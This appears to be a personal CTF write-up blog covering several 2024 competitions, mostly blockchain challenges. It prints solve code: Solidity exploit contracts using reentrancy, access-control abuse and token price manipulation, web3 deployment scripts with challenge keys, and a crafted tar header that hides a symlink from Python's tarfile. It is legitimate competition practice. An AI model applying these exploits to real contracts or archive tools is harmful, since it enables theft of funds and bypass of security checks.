        obj.devmajor = nti(buf[329:337])
        obj.devminor = nti(buf[337:345])
        prefix = nts(buf[345:500], encoding, errors)

We're adding a symbolic link file to my.tar.
Here's how to bypass tarfile so it can't read it, while allowing tar to extract it without issue:

In tarfile, if an InvalidHeaderError occurs during frombuf in obj.devminor, it skips parsing the file.
tar will ignore the error and proceed with the extraction.

This way, the symbolic link can be bypassed during the reading process but still extracted properly.

solve

def calculate_checksum(header):
    checksum_field = header[148:156]
    header = header[:148] + b' ' * 8 + header[156:]
    checksum = sum(header)
    return checksum 

data = open("my.tar", "rb").read()

offset = 0xa00

needed_data = data[offset:]

needed_data = needed_data[:337] + b"\x60" + b"\x01" * 5 + b"\x80" + b"\x00" + needed_data[345:]
needed_data = needed_data[:148] + bytes("%06o\0" % calculate_checksum(needed_data), "ascii") + b"\x20" + needed_data[156:]

print(bytes("%06o\0" % calculate_checksum(needed_data), "ascii"))

written_data = data[:offset] + needed_data

open("go.tar", "wb").write(written_data)

justctf2024 teaser

gss1 — Mon, 17 Jun 2024 14:04:11 +0900

The Otter Scrolls

module solve::solve {

    // [*] Import dependencies
    use challenge::theotterscrolls;

    public fun solve(
        spellbook: &mut theotterscrolls::Spellbook,
        _ctx: &mut TxContext
    ) {
        let v: vector<u64> = vector[1, 0, 3, 3, 3];
        theotterscrolls::cast_spell(v, spellbook);
    }

}

Dark BrOTTERhood

module solve::solve {

    // [*] Import dependencies
    use challenge::Otter::{Self, OTTER};
    use sui::random::Random;

    #[allow(lint(public_random))]
    public fun solve(
        vault: &mut Otter::Vault<OTTER>,
        questboard: &mut Otter::QuestBoard,
        player: &mut Otter::Player,
        r: &Random,
        ctx: &mut TxContext,
    ) {
        Otter::buy_sword(vault, player, ctx);
        Otter::find_a_monster(questboard, r, ctx);
        Otter::fight_monster(questboard, player, 0);
        Otter::return_home(questboard, 0);


        let mut i = 0;

        while (i <= 100) {
            Otter::find_a_monster(questboard, r, ctx);
            Otter::get_the_reward(vault, questboard, player, 0, ctx);
            i = i + 1;
        };




        let flag = Otter::buy_flag(vault, player, ctx);
        Otter::prove(questboard, flag);

    }

}

World of Ottercraft

module solve::solve {

    // [*] Import dependencies
    use challenge::Otter::{Self, OTTER};

    public fun solve(
        board: &mut Otter::QuestBoard,
        vault: &mut Otter::Vault<OTTER>,
        player: &mut Otter::Player,
        ctx: &mut TxContext
    ) {
        let quest_id = 0;


        let mut ticket = Otter::enter_tavern(player);
        Otter::buy_sword(player, &mut ticket);
        Otter::checkout(ticket, player, ctx, vault, board);
        
        let mut i = 0 ;

        while(i < 25) {
            Otter::find_a_monster(board, player);
            i = i + 1;
        };
        
        Otter::bring_it_on(board, player, quest_id);
        Otter::return_home(board, player);
        Otter::get_the_reward(vault, board, player, ctx);

        i = 0;
        while (i < 24) {
            let mut ticket = Otter::enter_tavern(player);
            Otter::buy_shield(player, &mut ticket);
            Otter::get_the_reward(vault, board, player, ctx);
            Otter::checkout(ticket, player, ctx, vault, board);
            i = i + 1;
        };
        let mut ticket = Otter::enter_tavern(player);
        Otter::buy_flag(&mut ticket, player);
        Otter::checkout(ticket, player, ctx, vault, board);


    }

}

codegate 2024 quals

gss1 — Mon, 3 Jun 2024 16:04:32 +0900

I played codegate 2024 quals with thehackerscrew.

Staker

the root cause is burnfrom.

contract Solve {
    Setup public setup;
    StakingManager public stakingManager;
    Token public token;
    LpToken public lpToken;
    constructor(address _setup) {
        setup = Setup(_setup);
        setup.withdraw();
        stakingManager = StakingManager(setup.stakingManager());
        token = Token(setup.token());
        token.approve(address(stakingManager), 1e18);
        lpToken = LpToken(stakingManager.LPTOKEN());
        uint rewardPerToken = uint(1e18) / uint(186400);
        uint amount = 1e18 / rewardPerToken;
        
        stakingManager.stake(1e18);
    }

    function solve() public {
        lpToken.burnFrom(address(setup), 100000e18);
        stakingManager.unstakeAll();
        token.transfer(address(setup), 10e18);
    }
}

from web3 import Web3
import json
import time
w3 = Web3(Web3.HTTPProvider("http://43.201.150.10:8888/7056dc15-ef8b-4d97-b12b-f9b527458d60"))
#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = '0xc2f5d87f9eec45cdd55b4ab902d0364452545437321a21f2519484eeffdbad72'
challenge_addr = "0xD9456D27A0A7c8153126Da47d6077be1ea461DA9"

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

f = open("solve.abi", "r"); contract_abi= f.read(); f.close()
f = open("solve.bin", "r"); contract_bytecode= f.read(); f.close()

contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
transaction = contract.constructor(challenge_addr).build_transaction(
    {
        "chainId": w3.eth.chain_id,
        "gasPrice": w3.eth.gas_price,
        "from": Public_Address,
        "nonce": w3.eth.get_transaction_count(Public_Address),
        "value": 0
        # "value": 0 
    }
)
sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
print("Deploying Contract!")
# Send the transaction
transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
# Wait for the transaction to be mined, and get the transaction receipt
print("Waiting for transaction to finish...")
transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
print(transaction_receipt)
print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")

cont_addr = transaction_receipt.contractAddress
contract = w3.eth.contract(address=cont_addr, abi=contract_abi, bytecode=contract_bytecode)

time.sleep(10)

while True:
    try:
        func_call = contract.functions["solve"]().build_transaction({
            "from": myAddr,
            "nonce": w3.eth.get_transaction_count(myAddr),
            "gasPrice": w3.eth.gas_price,
            "chainId": w3.eth.chain_id,
        })
        signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
        result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
        transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
        print(transaction_receipt)
        break
    except:
        time.sleep(1)
        continue

dice or die

we can extract the commitment by looking at the data in the Metamask transaction approval window

from web3 import Web3
import json
import time
w3 = Web3(Web3.HTTPProvider("https://public-en-baobab.klaytn.net"))
#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = ''
challenge_addr = "0x0A3E3E87C2B51469E56404459078e043B12e6cD6"

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

f = open("cont.abi", "r"); contract_abi= f.read(); f.close()

contract = w3.eth.contract(address=challenge_addr, abi=contract_abi)


print(w3.eth.get_balance(myAddr))
print(w3.eth.chain_id)
print(myAddr)


func_call = contract.functions["buyFlag"](bytes.fromhex("c82b22c857d0d1aa9165ee05d162123e8882eca527969004fd717cc0fcbdcef0")).build_transaction({
    "from": myAddr,
    "nonce": w3.eth.get_transaction_count(myAddr),
    "gasPrice": w3.eth.gas_price,
    "chainId": w3.eth.chain_id,
})
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
print(transaction_receipt)


fund = 99


while True:
    print(f"current: {fund}")
    data = input("data: ")
    # data = "0x4082de6700000000000000000000000000000000000001fe032125bb753ea778a4db798a00000000000000000000000000000000000001a37c14be67ebb5f8db428136e7"
    data = data[10:]
    index = int("0x" + data[:64], 16)
    commitment = int("0x" + data[64:], 16)


    func_call = contract.functions["bet"](index, commitment % 6, fund).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

    func_call = contract.functions["open"](index, commitment).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

    fund = (fund - 1) * 3

game$ay

the idea is 00 != 0.

            elif node.name.value == "pwrite":
                n = args[0].value
                if n < 0 or n >= self.machine_count:
                    return WValue('bool', False)
                
                if node.arguments[0].value == str(0) and machine_id != 0: # bypass using str(00) 
                    return WValue('bool', False)

                self.wP(n, args[1].value)

                return WValue('bool', True)

import base64

print(base64.b64encode(b"func solve() void {print(flag());}pwrite(00, [solve, solve, solve]);"))

# 1. add new code
# 2. run 1
# 2. run 0

trends_notification

thank you, H҈-̸m҈m̷e̵r̴ — and gpt.

def hex_to_bytes(hex_string):
    return bytes.fromhex(hex_string)

def bytes_to_string(byte_array):
    return byte_array.decode('utf-8')

def reverse_custom_operation(encrypted_str):
    arrayList = []
    i6 = 0
    c3 = 0
    while i6 < len(encrypted_str):
        char_at = encrypted_str[i6]
        i6 += 1
        # Subtract the incremental value and ensure it wraps correctly with % 256
        arrayList.append(chr((ord(char_at) - c3 + 256) % 256))
        c3 += 1
    return ''.join(arrayList)

def xor_strings(s, key):
    return ''.join(chr(ord(c) ^ ord(k)) for c, k in zip(s, key * (len(s) // len(key) + 1)))

# Given data
key = "lollollollollollollollollollollollollollollollol"
encrypted_string = "0f010a0c0c121e1166656763236c68636c69676a6e6a20247524797679717675752b7b7b787b7b7c327d7fc288c2863e"

# Step 1: Convert hex string to bytes
byte_array = hex_to_bytes(encrypted_string)

# Step 2: Convert bytes to string
intermediate_string = bytes_to_string(byte_array)

# Step 3: Reverse the custom operation
reversed_custom_string = reverse_custom_operation(intermediate_string)

# Step 4: XOR with the key to retrieve the original string
original_string = xor_strings(reversed_custom_string, key)

print("Original String:", original_string)

댓글 삭제

gss1 — Fri, 10 May 2024 02:01:14 +0900

스팸 공격을 당해서 모든 댓글을 삭제했습니다..

댓글 달아주셨던 분들 다 기억하고 있습니다 ㅎㅎ

Dreamhack Invitational Quals

gss1 — Fri, 3 May 2024 18:47:21 +0900

ExcellentMember

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "./Ownable.sol";

contract ExcellentMember is Ownable {
    bool public solved;

    mapping(address => bool) public join;
    mapping(address => bool) public excellentMember;

    address[] public excellentMembers;

    constructor() Ownable(msg.sender) {
        excellentMember[address(this)] = true;
        excellentMembers.push(address(this));    
    }

    function adminCall(address target, bytes memory data) external payable onlyOwner returns (bytes memory) {
        (bool success, bytes memory returnData) = target.call{value: msg.value}(data);
        require(success, "Fail Low-Level call");
        return returnData;
    }

    function setJoin(bool opinion) external {
        join[msg.sender] = opinion;
    }

    function registryExcellentMember(address member) external { // adminCall로 진입
        require(!excellentMember[member], "Already excellent member");
        require(join[member], "Set join");
        require(excellentMember[msg.sender] == true, "Only excellent member");
        excellentMember[member] = true;
        excellentMembers.push(member);
    }

    function solve() external {
        if (excellentMember[tx.origin] == true) {
            solved = true;
        }
    }
}
// {
//   "message": {
//     "level_contract_address": "0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451",
//     "user_private_key": "0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8",
//     "user_address": "0xD2d66D72780D836919f3066d483f58890A035A08"
//   }
// }
// http://host6.dreamhack.games:22022/383fe87a2e65/rpc
// cast send --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451 "setJoin(bool)" true
// 1. 외부에서 EoA로 setJoin하고
 
// 2. adminCall로 EoA excellentMember 등록
// forge create Solve --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc --constructor-args 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451

// 3. EoA로 solve 호출
// cast send --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451 "solve()"

contract Solve {
    ExcellentMember public chall;

    constructor (address _chall) {
        chall = ExcellentMember(_chall);
        chall.transferOwnership(address(this));
        bytes memory data = abi.encodeWithSignature("registryExcellentMember(address)", address(msg.sender)); 
        chall.adminCall(address(chall), data);
    }
}

DreamIdle

from web3 import Web3
import json
import time
w3 = Web3(Web3.HTTPProvider("http://host6.dreamhack.games:22237/cd5c806e8a7e/rpc"))
#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = '0x3a2c14bc8b0a2fecad0093b1df71a5e7caf2d082b243b429550a7325a6b76a3f'
challenge_addr = "0xb5f33218b54489b6Cf362Be88C40F54AcaA13642"


initGame_0 = "c869ce640000000000000000000000000000000000000000000000000000000000000000"
initGame_1 = "c869ce640000000000000000000000000000000000000000000000000000000000000001"
sleep_1 = "fa9d87130000000000000000000000000000000000000000000000000000000000000001"
feed_0 = "f59dfdfb0000000000000000000000000000000000000000000000000000000000000000"
feed_1 = "f59dfdfb0000000000000000000000000000000000000000000000000000000000000001"
study_1 = "202457340000000000000000000000000000000000000000000000000000000000000001"
levelup_1 = "0ce90ec20000000000000000000000000000000000000000000000000000000000000001"
solve_1 = "b8b8d35a0000000000000000000000000000000000000000000000000000000000000001"

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

my_nonce = w3.eth.get_transaction_count(myAddr)
gasPrice = w3.eth.gas_price
chainId = w3.eth.chain_id

def send_tx(value, data):
    global my_nonce, chainId, gasPrice, myAddr
    func_call = {
        "from": myAddr,
        "to": challenge_addr,
        "nonce": my_nonce,
        "gasPrice": gasPrice,
        "value": value,
        "chainId": chainId,
        "data": data,
        "gas": 30000000
    }
    my_nonce = my_nonce + 1
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    w3.eth.send_raw_transaction(signed_tx.rawTransaction)

send_tx(0, initGame_0)
send_tx(0, feed_0)
send_tx(0, initGame_1)

for i in range(150):
    send_tx(0, feed_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, sleep_1)
    print(i)

send_tx(0, levelup_1)
print("level_up")

for i in range(150):
    send_tx(0, feed_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, sleep_1)
    print(i)

send_tx(0, levelup_1)
send_tx(10**18, solve_1)

MagicVote

from web3 import Web3, HTTPProvider
from eth_account import Account
from eth_account.messages import encode_defunct


w3 = Web3(Web3.HTTPProvider("http://host3.dreamhack.games:11867/d738f32dc72c/rpc"))


#Check Connection
t=w3.is_connected()
print(t)


# Get private key 
prikey = '0xb18184dd52cc15b7a86e2fc22e13f28d32162596b8c19a7a918cdd6db1b319b6'
challenge_addr = "0xbf8736b83ee325A550F06918aE59D5bB63C9D807"

PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address





f = open("abi.json", "r"); contract_abi= f.read(); f.close()

contract = w3.eth.contract(abi=contract_abi, address=challenge_addr)


# 개인 키 설정
private_key = '0x0000000000000000000000000000000000000000000000000000000000000001'

# 함수 시그니처와 데이터 준비
function_signature = bytes.fromhex('9abe73cf')

# 데이터 포맷에 맞게 인코딩
data = function_signature + b'\x00' * 32 + b'\x01'.rjust(32, b'\x00')

print(data.hex())



import os
from ecdsa import SigningKey, SECP256k1, util
from Crypto.Hash import _keccak
sk = SigningKey.from_string(bytes.fromhex(private_key[2:]), curve=SECP256k1)

for _ in range(6):

    # 메시지 준비

    # 직접 지정한 nonce 값
    nonce = os.urandom(32)  

    # nonce를 사용하여 서명 생성
    signature = sk.sign_digest(w3.keccak(data))

    r = int.from_bytes(signature[:32], byteorder='big')
    s = int.from_bytes(signature[32:64], byteorder='big')

    for v in [27, 28]:
            pub_key = Account._recover_hash(message_hash=w3.keccak(data), vrs=(v, r, s))
            if pub_key == Account.from_key(bytes.fromhex(private_key[2:])).address:
                print("Match found with v:", v)
                print(f"r: {hex(r)}, s: {hex(s)}, v: {v}")
                func_call = contract.functions["vote"](0, True, v, signature[:32], signature[32:64]).build_transaction({
                    "from": myAddr,
                    "nonce": w3.eth.get_transaction_count(myAddr),
                    "gasPrice": w3.eth.gas_price,
                    "chainId": w3.eth.chain_id,
                })
                signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
                result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
                transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
                print(transaction_receipt)
                break

osu!gaming 2024 - blockchain

gss1 — Mon, 4 Mar 2024 12:17:39 +0900

rankpls

    pub fn initialize(ctx: Context<Initialize>) -> Result<()> {
        // your instruction goes here

        let cpi_accounts = chall::cpi::accounts::Init {
            config: ctx.accounts.config.to_account_info(),
            admin: ctx.accounts.mapper.to_account_info(),
            system_program: ctx.accounts.system_program.to_account_info(),
        };
        let cpi_ctx = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::init(cpi_ctx)?;

        let cpi_accounts = chall::cpi::accounts::AddBn {
            config: ctx.accounts.config.to_account_info(),
            admin: ctx.accounts.mapper.to_account_info(),
            bn: ctx.accounts.mapper.to_account_info(),
        };
        let cpi_ctx = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::add_bn(cpi_ctx)?;

        let cpi_accounts = chall::cpi::accounts::RankMap {
            config: ctx.accounts.config.to_account_info(),
            map: ctx.accounts.map.to_account_info(),
            bn: ctx.accounts.mapper.to_account_info(),
        };
        let cpi_ctx = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::rank_map(cpi_ctx)?;


        Ok(())
    }

scorechain

    pub fn initialize(ctx: Context<Initialize>) -> Result<()> {
        let cpi_accounts = chall::cpi::accounts::SubmitPlay {
            db: ctx.accounts.db.to_account_info(),
            player: ctx.accounts.user.to_account_info(),
            system_program: ctx.accounts.system_program.to_account_info(),
        };
        let cpi_ctx = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::submit_play(cpi_ctx, chall::Play {
            map: String::from("blue zenith"),
            player: String::from("chocomint"),
            pp: 728,
            bounty: 1,
        },)?;
        Ok(())
    }

GCC CTF 2024 - web3

gss1 — Mon, 4 Mar 2024 12:12:12 +0900

https://ctftime.org/event/2251

GCC CTF 2024

TOP 1 : 750€ Cash, 5x 1 Month HTB Prolabs, 4x Root-me Premium + 5x 30€ shop voucher TOP 2 : 500€ Cash, 5x 1 Year HTB VIP+, 3x Root-me Premium + 5x 20€ shop voucher TOP 3 : 300€ Cash, 5x 6 Months HTB VIP, 2x Root-me Premium + 5x 10€ shop voucher

ctftime.org

synthatsu_katana_thief

contract Solve{
    Challenge public challenge;
    KatanaSale public katanaSale;
    constructor(address _challenge) {
        challenge = Challenge(_challenge);
        katanaSale = KatanaSale(challenge.katanaSale());
        katanaSale.becomeBeyond("I will check out @BeyondBZH and @gcc_ensibs on X");
        katanaSale.endSale();
        katanaSale.transfer(challenge.PLAYER(), 60);
    }
}

gcc_first_drop

contract Solve {
    Challenge public challenge;
    BeyondNFT public beyondNFT;
    AboveNFT  public aboveNFT;
    uint public num = 0;
    constructor (address _challenge) payable {
        challenge = Challenge(_challenge);
        beyondNFT = BeyondNFT(challenge.beyond());
        beyondNFT.mint{value: 1 ether}();
        aboveNFT = AboveNFT(challenge.above());
    }

    function execute() public {
        beyondNFT.claimSpecialPrize();
        for(uint i = 1; i < 7; i++) {
            aboveNFT.transferFrom(address(this), challenge.PLAYER(), i);
        }
    }

    function onERC721Received(address to, address to2, uint256 tokenId, bytes calldata data) public returns (bytes4) {
        if (num < 7) {
            num++;
            beyondNFT.claimSpecialPrize();
        }
        return this.onERC721Received.selector;
    }
}

ode

contract Solve {
    Challenge public challenge = Challenge(0xD3dFB133C651DA0948F1D35464F459CCcd7d42B2);
    address public target = challenge.target(); 
    constructor() payable {}

    function step1() public payable{
        bytes memory data = abi.encode(uint256(uint160(address(this))));
        (bool su, bytes memory g) = address(challenge.target()).call(data);
        require(su == true);
        bytes memory data2 = hex'5f6060565b608060405260258060726000396000f3fe7f0000000000000000576861742061626f7574203078356320262030783562203f60005500';
        (su, g) = address(challenge.target()).call{value: 59}(data2);
        require(su == true);
    }

    function step2() public payable{
        bytes memory data = abi.encode(uint256(uint160(address(this)) + 1));
        (bool su, bytes memory g) = address(challenge.target()).call(data);
        require(su == true);
    }
}

tootb

curl -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"anvil_setBalance","params":["0xCaffE305b3Cc9A39028393D3F338f2a70966Cb85", "20000000000000000000000000000000"],"id":84}' http://worker03.gcc-ctf.com:11560/rpc

gcc_pincer

contract Solve {
    IUniswapV2Router02 public immutable uniswapRouter = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
    address public immutable WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address public immutable MINAMINAO = 0x710ACb69aCa6aD658633A50D5e0CFFA52Dc7Bf07;
    address public immutable PLAYER = 0xCaffE305b3Cc9A39028393D3F338f2a70966Cb85;
    Beyond public beyond;
    Vault public vault;
    Challenge public challenge;

    uint public before_vault_weth;
    uint public before_vault_beyond;
    uint public after_vault_weth;
    uint public after_vault_beyond;

    constructor (address _challenge) payable{
        challenge = Challenge(_challenge);
        beyond = challenge.beyond();
        vault = challenge.vault();

        before_vault_weth = IERC20(WETH).balanceOf(address(vault));
        before_vault_beyond = IERC20(beyond).balanceOf(address(vault));
    }

    function estimateAmountOut(uint256 amountIn, address[] memory path) external view returns(uint256) {
        uint256[] memory amounts = uniswapRouter.getAmountsOut(amountIn, path); //// ?
        return amounts[1] - (amounts[1] * 5 / 1000);
    }

    function step1() public {
        IWETH(WETH).deposit{value : 490 ether}();
        IERC20(WETH).approve(address(uniswapRouter), type(uint256).max);
        IERC20(WETH).approve(address(beyond), type(uint256).max);
        IERC20(beyond).approve(address(uniswapRouter), type(uint256).max);
        IERC20(beyond).approve(address(beyond), type(uint256).max);
        
        beyond.buy(350 ether);



        address[] memory path = new address[](2);
        path[1] = WETH;
        path[0] = address(beyond);
        uniswapRouter.swapExactTokensForTokens(350 ether, this.estimateAmountOut(350 ether, path), path, address(this), block.timestamp);
    }

    function step2() public {
        
        after_vault_weth = IERC20(WETH).balanceOf(address(vault));
        after_vault_beyond = IERC20(beyond).balanceOf(address(vault));

        address[] memory path = new address[](2);
        path[0] = WETH;
        path[1] = address(beyond);
        uniswapRouter.swapExactTokensForTokens(140 ether, this.estimateAmountOut(140 ether, path), path, address(this), block.timestamp);
    }
}

from web3 import Web3
import json
import time
w3 = Web3(Web3.HTTPProvider("http://worker02.gcc-ctf.com:13141/rpc"))
#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = '0x6715d324d14e0565ab02a575fa5f74540719ba065a610cba6497cdbf22cd5cdb'
challenge_addr = "0x8E4Dc4233Fe0c90674924c0f5b94A78F60fe0D29"

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

f = open("att.abi", "r"); contract_abi= f.read(); f.close()
f = open("att.bin", "r"); contract_bytecode= f.read(); f.close()

contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
transaction = contract.constructor(challenge_addr).build_transaction(
    {
        "chainId": w3.eth.chain_id,
        "gasPrice": w3.eth.gas_price,
        "from": Public_Address,
        "nonce": w3.eth.get_transaction_count(Public_Address),
        "value": 490 * 10**18 
        # "value": 0 
    }
)
sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
print("Deploying Contract!")
# Send the transaction
transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
# Wait for the transaction to be mined, and get the transaction receipt
print("Waiting for transaction to finish...")
transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
print(transaction_receipt)
print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")

cont_addr = transaction_receipt.contractAddress
contract = w3.eth.contract(address=cont_addr, abi=contract_abi, bytecode=contract_bytecode)
print(contract.functions["before_vault_weth"]().call()//10**18)
print(contract.functions["before_vault_beyond"]().call()//10**18)

func_call = contract.functions["step1"]().build_transaction({
    "from": myAddr,
    "nonce": w3.eth.get_transaction_count(myAddr),
    "gasPrice": w3.eth.gas_price,
    "chainId": w3.eth.chain_id,
})
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
print(transaction_receipt)


time.sleep(120)


func_call = contract.functions["step2"]().build_transaction({
    "from": myAddr,
    "nonce": w3.eth.get_transaction_count(myAddr),
    "gasPrice": w3.eth.gas_price,
    "chainId": w3.eth.chain_id,
})
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
print(transaction_receipt)

print(contract.functions["after_vault_weth"]().call()//10**18)
print(contract.functions["after_vault_beyond"]().call()//10**18)

LACTF 2024 - zerocoin, remi-s world

gss1 — Mon, 19 Feb 2024 07:01:53 +0900

https://ctftime.org/event/2102

zerocoin

analysis

The challenge requires users to fill their Associated Token Account with any token.

We cannot mint Zerocoin with 1_000_000 native tokens.

Therefore, we should send the native token to the user's ATA and then convert it to wrapped SOL.

https://spl.solana.com/token#example-wrapping-sol-in-a-token

solve

lib.rs

#[cfg(not(feature = "no-entrypoint"))]
pub mod entrypoint {
    use anchor_lang::prelude::*;
    use solana_program::{
        account_info::AccountInfo, entrypoint, entrypoint::ProgramResult,
        program::{invoke, invoke_signed},
        program_pack::Pack,
        system_instruction,
    };
    use zerocoin::cpi;

    entrypoint!(process_instruction);

    pub fn process_instruction(
        _program_id: &Pubkey,
        _accounts: &[AccountInfo],
        _instruction_data: &[u8],
    ) -> ProgramResult {
        let user = _accounts[0].clone();
        let vault = _accounts[1].clone();
        let mint = _accounts[2].clone();
        let user_token = _accounts[3].clone();
        let program = _accounts[4].clone();
        let token_program = _accounts[5].clone();
        let system_program = _accounts[6].clone();
        let native_mint = _accounts[7].clone();

        let cpi_accounts = zerocoin::cpi::accounts::Register {
            token: user_token.clone(),
            vault: vault.clone(),
            mint: native_mint.clone(),
            zerocoin: program.clone(),
            token_program: token_program.clone(),
            system_program: system_program.clone(),
        };
        let cpi_ctx = CpiContext::new(program.clone(), cpi_accounts);
        zerocoin::cpi::register(cpi_ctx, *user.key);

        invoke(
            &system_instruction::transfer(
                user.key,
                user_token.key,
                1,
            ),
            &[
                user.to_account_info(),
                user_token.to_account_info(),
            ],
        )?;

        invoke(
            &spl_token::instruction::sync_native(
                token_program.key,
                user_token.key,
            )?,
            &[
                user_token.to_account_info(),
                token_program.to_account_info(),
            ],
        )?;

        Ok(())
    }
}

solve.py

#!/usr/bin/env python3

from pwn import *

p = remote("127.0.0.1", 5000)

addrs = {}
while True:
    name = p.recvuntil(b": ", drop=True).decode()
    if name == "program pubkey":
        break
    key = p.recvline(keepends=False).decode()
    addrs[name] = key

addrs['native_mint'] = "So11111111111111111111111111111111111111112"

# can change pubkey to anything else, this is just a randomly generated valid pubkey
p.sendline(b"ExNhUJ35wXCJCD7wtB8BjCpRK5xrD2cLqXXtnsjrWVkE")

# copy solve.so to cwd or change this path to ./solve/sbf-solana-solana/release/solve.so
with open("./solve/target/sbf-solana-solana/release/solve.so", "rb") as f:
    solve = f.read()

p.sendlineafter(b"program len: \n", str(len(solve)).encode())
p.send(solve)

# can change accounts, s means signer, r/w means readonly/writable
accounts = """
user: sw
vault: -w
mint: -w
user_token: -w
program: -r
token_program: -r
system_program: -r
native_mint: -r
"""

accounts = [l.split(": ") for l in accounts.strip().split("\n")]
p.sendlineafter(b"num accounts: \n", str(len(accounts)).encode())
p.sendline("\n".join(f"{b} {addrs[a]}" for (a, b) in accounts).encode())

# can add data to the instruction
ix_data = b"filler data"

p.sendlineafter(b"ix len: \n", str(len(ix_data)).encode())
p.send(ix_data)

p.interactive()

remi's world

solve

contract Solve {
    Remis public remis;

    constructor(address _setup) {
        Setup setup = Setup(_setup);
        address _remis = address(setup.remis());
        address _target = address(setup.shady());
        remis = Remis(_remis);
        for(uint i = 0; i < 10 ; i++) {
            remis.openAccount();
            remis.sendMoney(10, _target);
        }
    }

    /*
    forge create Solve --private-key 0xda34a7faffb463b2897a39ab73f44190878402f60d99dd40d569161c6c83ed37 --rpc-url https://remis-world.chall.lac.tf/fa5ed621-c7e1-4e9b-8fdd-35154e553001 --constructor-args 0x8C71DE458B582A6Ad988645e56700927eaBD8CCa
    lactf{irr3v3r5ib1e_d4m4g3}
    */
}

DiceCTF 2024 Quals - floordrop(blockchain)

gss1 — Mon, 5 Feb 2024 06:01:54 +0900

https://ctftime.org/event/2217

I participated in DiceCTF Quals with CyKor and was interest in three challenges.

floordrop
what-a-jpeg-is
dicediceotter

I tried a PGD-attack on what-a-jpeg-is but failed and didn't have the courage to start dicediceotter.

analysis

pow.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

contract Owned {
    address payable owner;

    constructor() {
        owner = payable(msg.sender);
    }

    // Access control modifier
    modifier onlyOwner() {
        require(msg.sender == owner);
        _;
    }
}

contract ProofOfWork is Owned {
    uint256 public currentChallenge;
    uint256 public currentBlock;

    event GotFlag(uint256 indexed nonce);

    function setChallenge(uint256 challenge) public onlyOwner {
        currentChallenge = challenge;
        currentBlock = block.number;
